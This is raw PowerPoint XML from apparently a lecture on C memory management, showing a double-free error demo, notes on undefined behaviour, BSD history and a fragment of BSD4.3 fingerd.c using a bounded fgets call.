            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Wall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toofree.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gash&gt; .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(23685) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: *** error for object 0x10a1008d0: pointer being freed was not allocated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*** set a breakpoint in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc_error_break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abort trap: 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548617" y="984691"/>
            <a:ext cx="4450162" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="8100000" algn="tr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note: this is what happens to happen on my computer, but the C behavior is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>undefined.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It would be “correct” for a C program like this to do absolutely anything!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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39320" y="1096560"/>
              <a:ext cx="2325240" cy="3841920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="129960" y="1087200"/>
                <a:ext cx="2343960" cy="3860640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1462528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8250" y="1285834"/>
            <a:ext cx="6427011" cy="1450535"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A More Realistic Example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15397667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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247193" y="139072"/>
            <a:ext cx="8097692" cy="4801315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/*                                                                                                                                                                                                                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * Copyright (c) 1983 The Regents of the University of California.                                                                                                                                                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * All rights reserved.                                                                                                                                                                                                                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> *                                                                                                                                                                                                                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * Redistribution and use in source and binary forms are permitted                                                                                                                                                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * provided that the above copyright notice and this paragraph are                                                                                                                                                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...                                                                                                                                                                                                                                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EPRESS OR                                                                                                                                                                            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED                                                                                                                                                                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.                                                                                                                                                                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>[];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979694" y="4133553"/>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033520" y="3855240"/>
              <a:ext cx="2744280" cy="929520"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Ink 4"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5024160" y="3845880"/>
                <a:ext cx="2763000" cy="948240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24456227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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3452094" y="233796"/>
            <a:ext cx="2567709" cy="4432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4" y="1044288"/>
            <a:ext cx="2567709" cy="4883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3" y="1992879"/>
            <a:ext cx="2567709" cy="430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2" y="2817666"/>
            <a:ext cx="2567709" cy="7845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2" y="1991592"/>
            <a:ext cx="2567709" cy="4589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2" y="3914777"/>
            <a:ext cx="2567709" cy="6208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2" y="2804694"/>
            <a:ext cx="2567709" cy="5117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2" y="3716481"/>
            <a:ext cx="2567709" cy="4268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3" y="4466236"/>
            <a:ext cx="2567709" cy="5229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955436" y="313171"/>
            <a:ext cx="458933"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450280" y="2632505"/>
            <a:ext cx="367149"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77556" y="3756891"/>
            <a:ext cx="312596"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257178" y="54292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40005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259493" y="1072846"/>
            <a:ext cx="400048"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895337"/>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552329" y="859080"/>
            <a:ext cx="367238"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98992" y="1255925"/>
            <a:ext cx="460220"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65891" y="1548326"/>
            <a:ext cx="381442"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90942" y="351645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429534" y="4304802"/>
            <a:ext cx="322863"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3" y="2859665"/>
            <a:ext cx="2567709" cy="430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81585" y="2263922"/>
            <a:ext cx="436413"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167277" y="2060079"/>
            <a:ext cx="426443"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216551" y="233796"/>
            <a:ext cx="1470249" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(from Class 4)</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878760" y="1095480"/>
              <a:ext cx="6205680" cy="3500640"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="869400" y="1086120"/>
                <a:ext cx="6224400" cy="3519360"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13452357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82000"/>
          </a:blip>
          <a:srcRect t="11771" b="13229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6271" y="0"/>
            <a:ext cx="9144001" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="205977"/>
            <a:ext cx="2958661" cy="1843539"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="34000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Berkeley Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Distribution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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2248995" y="2600887"/>
            <a:ext cx="5628388" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="34000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Developed by UC Berkeley, 1977-1995</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Initial codebase: AT&amp;T Unix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1992 lawsuit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>injunction blocks distributing 386 Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>settled in 1994: remove 3 lines of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	(out of 18,000) (“4.4BSD-lite”)</a:t>
            </a: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79680" y="774360"/>
              <a:ext cx="6819120" cy="3729600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="670320" y="765000"/>
                <a:ext cx="6837840" cy="3748320"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3309856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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959088" y="459168"/>
            <a:ext cx="7232368" cy="4093428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“So </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>there you have it: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>single Greatest Piece of Software Ever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>with the broadest impact on the world, was BSD 4.3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Unixes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> were bigger commercial successes. But as the cumulative accomplishment of the BSD systems, 4.3 represented an unmatched peak of innovation. BSD 4.3 represents the single biggest theoretical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>undergirder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of the Internet. Moreover, the passion that surrounds Linux and open source code is a direct offshoot of the ideas that created BSD: a love for the power of computing and a belief that it should be a freely available extension of man's intellectual powers--a force that changes his place in the universe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Charles Babcock, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>What's the Greatest Software Ever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>Written</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>InformationWeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, 11 August 2006.</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8220600" y="361080"/>
              <a:ext cx="356760" cy="841680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8211240" y="351720"/>
                <a:ext cx="375480" cy="860400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70390355"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="29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Exam 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Concurrent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Collatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Challenge Winner!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Memory Management </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17009143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41800" y="2078280"/>
              <a:ext cx="2786400" cy="2364840"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Ink 4"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="532440" y="2068920"/>
                <a:ext cx="2805120" cy="2383560"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22368480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p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-02-11 at 9.09.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314" y="139072"/>
            <a:ext cx="5735706" cy="311663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857880" y="1110240"/>
              <a:ext cx="5391720" cy="2045160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="848520" y="1100880"/>
                <a:ext cx="5410440" cy="2063880"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16409496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21</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(line, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(line)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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3832391"/>
            <a:ext cx="3147015" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>BSD4.3 (1986) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>fingerd.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
